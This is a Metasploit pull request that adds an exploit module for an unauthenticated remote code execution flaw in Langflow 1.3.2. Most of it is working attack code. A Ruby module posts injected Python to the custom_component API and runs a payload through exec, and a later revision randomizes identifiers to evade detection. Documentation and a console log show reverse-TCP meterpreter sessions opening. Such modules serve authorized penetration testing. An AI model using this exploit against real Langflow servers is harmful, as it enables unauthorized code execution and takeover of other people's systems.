### PR TITLE
ENH: Exploit module for Langflow Unauthenticated Remote Code Execution vulnerability CVE-2026-0769

### DIFF
--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0769.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0769.md
@@ -1,0 +1,62 @@
+## Vulnerable Application
+
+Langflow version 1.3.2 is susceptible to unauthenticated remote code execution
+due to improper input validation in the eval_custom_component_code() function.
+
+The vulnerability affects:
+
+    * Langflow version 1.3.2
+
+
+This module was successfully tested on:
+
+    * Langflow 1.3.2
+
+
+### Installation
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Langflow docker container (v1.3.2) in your VM.
+   `docker pull langflowai/langflow:1.3.2`
+4. Start the langflow container.
+
+
+```
+sudo docker run -d \
+  --name langflow \
+  -p 192.168.1.30:7860:7860 \
+  langflowai/langflow:1.3.2
+```
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_0769`
+4. Do: `run rhosts=<rhost>`
+5. You should get a meterpreter session
+
+
+## Options
+
+
+## Scenarios
+```
+msf > use multi/http/langflow_unauth_rce_cve_2026_0769
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_0769) > set RHOSTS 192.168.1.30
+RHOSTS => 192.168.1.30
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_0769) > exploit
+[*] Started reverse TCP handler on 192.168.1.30:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.3.2 detected, which appears vulnerable.
+[*] Sending stage (34540 bytes) to 172.17.0.2
+[*] Sending stage (34544 bytes) to 172.17.0.2
+[*] Sending stage (34544 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:54076) at 2026-09-02 21:58:56 -0400
+
+meterpreter > [*] Meterpreter session 3 opened (192.168.1.30:4444 -> 172.17.0.2:54098) at 2026-09-02 21:58:56 -0400
+
+meterpreter >  
+```

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0769.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_0769.md
@@ -3,6 +3,9 @@
 Langflow version 1.3.2 is susceptible to unauthenticated remote code execution
 due to improper input validation in the eval_custom_component_code() function.
 
+Arbitrary code executes under the context of the backend
+Langflow process.
+
 The vulnerability affects:
 
     * Langflow version 1.3.2

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0769.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0769.rb
@@ -1,0 +1,137 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI Eval Injection Unauth RCE',
+        'Description' => %q{
+          Langflow version 1.3.2 is susceptible to
+          unauthenticated remote code execution due to improper
+          input validation in the eval_custom_component_code() function.
+        },
+        'Author' => [
+          'Richard Howe <rhowe425>'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-0769']
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2026-09-02',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7860),
+        OptString.new(
+          'TARGETURI',
+          [true, 'Base path of the Langflow application', '/']
+        )
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+      }
+    )
+
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    doc = res.get_json_document
+    version_str = doc.is_a?(Hash) ? doc['version'] : nil
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+
+    package = doc.is_a?(Hash) ? doc['package'] : nil
+    return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
+    return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
+
+    version = Rex::Version.new(version_str.to_s)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+
+    # Vulnerable version of Langflow
+    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version == Rex::Version.new('1.3.2')
+
+    # Patched version of Langflow
+    Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
+  end
+
+  def exploit
+    injected_code = [
+      'from langflow.custom import Component',
+      'from langflow.io import Output, MessageTextInput',
+      'from langflow.schema import Data',
+      '_fired = [False]',
+      'class PwnComponent(Component):',
+      '    display_name = "CVE-2026-18729-Probe"',
+      '    name = "PwnComponent"',
+      '    inputs = [',
+      '        MessageTextInput(',
+      '            display_name="In",',
+      '            name="input_value",',
+      '        )',
+      '    ]',
+      '    outputs = [',
+      '        Output(',
+      '            display_name="Out",',
+      '            name="out",',
+      '            method="run",',
+      '        )',
+      '    ]',
+      "    @(lambda f: (_fired[0] or (_fired.__setitem__(0, True), exec(compile(\"#{payload.encode}\", '<string>', 'exec'))), f)[-1])",
+      '    def run(self) -> Data:',
+      '        return Data(data={"output": _out})'
+    ].join("\n")
+
+    json_body = {
+      'code' => injected_code,
+      'frontend_node' => {}
+    }
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/custom_component'),
+        'headers' => {
+          'Content-Type' => 'application/json'
+        },
+        'data' => json_body.to_json
+      }
+    )
+
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res&.code == 200
+  end
+end

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0769.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_0769.rb
@@ -1,5 +1,3 @@
-# frozen_string_literal: true
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -20,6 +18,9 @@ class MetasploitModule < Msf::Exploit::Remote
           Langflow version 1.3.2 is susceptible to
           unauthenticated remote code execution due to improper
           input validation in the eval_custom_component_code() function.
+
+          Arbitrary code executes under the context of the backend
+          Langflow process.
         },
         'Author' => [
           'Richard Howe <rhowe425>'
@@ -38,21 +39,21 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 7860 },
         'Payload' => {
           'BadChars' => '"'
         },
         'DisclosureDate' => '2026-09-02',
         'Notes' => {
-          'Stability' => [ CRASH_SAFE ],
-          'SideEffects' => [ IOC_IN_LOGS ],
-          'Reliability' => [ REPEATABLE_SESSION ]
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
         }
       )
     )
 
     register_options(
       [
-        Opt::RPORT(7860),
         OptString.new(
           'TARGETURI',
           [true, 'Base path of the Langflow application', '/']
@@ -90,29 +91,37 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    vars = Rex::RandomIdentifier::Generator.new(language: :python)
+
+    class_name = vars[:class_name]
+    payload_method = vars[:payload_method]
+    input_display_name = vars[:input_display_name]
+    output_display_name = vars[:output_display_name]
+    class_display_name = vars[:class_display_name]
+
     injected_code = [
       'from langflow.custom import Component',
       'from langflow.io import Output, MessageTextInput',
       'from langflow.schema import Data',
       '_fired = [False]',
-      'class PwnComponent(Component):',
-      '    display_name = "CVE-2026-18729-Probe"',
-      '    name = "PwnComponent"',
+      "class #{class_name}(Component):",
+      "    display_name = '#{class_display_name}'",
+      "    name = '#{class_name}'",
       '    inputs = [',
       '        MessageTextInput(',
-      '            display_name="In",',
+      "            display_name='#{input_display_name}',",
       '            name="input_value",',
       '        )',
       '    ]',
       '    outputs = [',
       '        Output(',
-      '            display_name="Out",',
+      "            display_name='#{output_display_name}',",
       '            name="out",',
-      '            method="run",',
+      "            method='#{payload_method}',",
       '        )',
       '    ]',
       "    @(lambda f: (_fired[0] or (_fired.__setitem__(0, True), exec(compile(\"#{payload.encode}\", '<string>', 'exec'))), f)[-1])",
-      '    def run(self) -> Data:',
+      "    def #{payload_method}(self) -> Data:",
       '        return Data(data={"output": _out})'
     ].join("\n")
 


### PR DESCRIPTION
## Description
This pull request adds a new exploit module that detects and exploits an unauthenticated remote code execution vulnerability impacting Langflow version 1.3.2

**Related Issue:** 
Fixes #21866 

## Breaking Changes
None

## Reviewer Notes


## Verification Steps
1. `docker pull` and `docker run` langflow, per documentation
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_0769`
4. Do: `set rhosts=<rhost>`
5. Do: `exploit`
6. You should get a meterpreter session



## Test Evidence
<img width="927" height="276" alt="image" src="https://github.com/user-attachments/assets/616647ed-9c97-4e0a-b386-12ab11fcf360" />


## Environment

| Field | Details |
|-------|---------|
| **Operating System** |  Ubuntu 22.04 |
| **Target Software/Hardware** | langflow 1.3.2 |
| **Docker Image / Vagrant Setup** | langflowai/langflow:1.3.2 |

## AI Usage Disclosure
None


## Pre-Submission Checklist

- [X] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [X] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [X] Tested on the target environment specified in the Environment section above
- [X] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [X] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)